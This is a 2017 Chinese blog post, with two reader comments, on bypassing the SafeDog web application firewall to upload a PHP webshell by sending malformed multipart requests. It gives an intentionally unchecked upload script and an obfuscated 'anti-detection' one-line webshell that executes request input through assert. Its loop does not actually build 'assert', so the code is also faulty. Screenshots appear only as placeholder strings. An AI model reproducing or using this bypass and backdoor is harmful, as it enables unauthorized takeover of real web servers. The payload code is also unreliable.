绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

原创 Yuntongxue 2017-03-08 11:33  阅读 2,680 次 评论 2 条

思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。

废话不多说,切入正题。。。。

1、实验环境:

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码:

<?php

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "<br/>";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求:

raoguowangzhananquangou_yunxiaogeboke

很明显,文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断:

raoguowangzhananquangou_yunxiaogeboke

很明显,失败了。。。

5、修改HTTP请求,构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段:

raoguowangzhananquangou_yunxiaogeboke
raoguowangzhananquangou_yunxiaogeboke

绕过网站安全狗的拦截,成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格:

raoguowangzhananquangou_yunxiaoge
raoguowangzhananquangou_yunxiaogeboke
raoguowangzhananquangou_yuntongxue.cn

(3)修改Content-Disposition字段值的大小写:

raoguowangzhananquangou_http://yuntongxue.cn

6、菜刀连接一句话:

raoguowangzhananquangou_http://yuntongxue.cn

到此,上传WebShell结束,各位看明白了吗?

7、免杀PHP一句话:

<?php
/*
PHP一句话木马
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
?>

raoguowangzhananquangou_yunxiaogeboke

8、修复漏洞:

出现这种情况,我认为是网站安全狗在开发时没有考虑到畸形HTTP请求,而Apache却兼容畸形HTTP请求,所以能够上传成功。

版权声明: 本文为云小哥博客原创文章,欢迎转载。转载请务必注明出处! (参考格式:本文转自云小哥博客,原文地址:https://yuntongxue.cn/318/
相关文章 关键词:

发表评论


表情

  1. 平行时空
    平行时空 回复 沙发 2017-03-08 13:35

    一句话后门应该怎么修复呢?

  2. GG
    GG 回复 板凳 2017-03-08 20:04

    评论黑阔博文以免网站被黑
    好文帮顶 & 顺便留个名~时间:20:01:14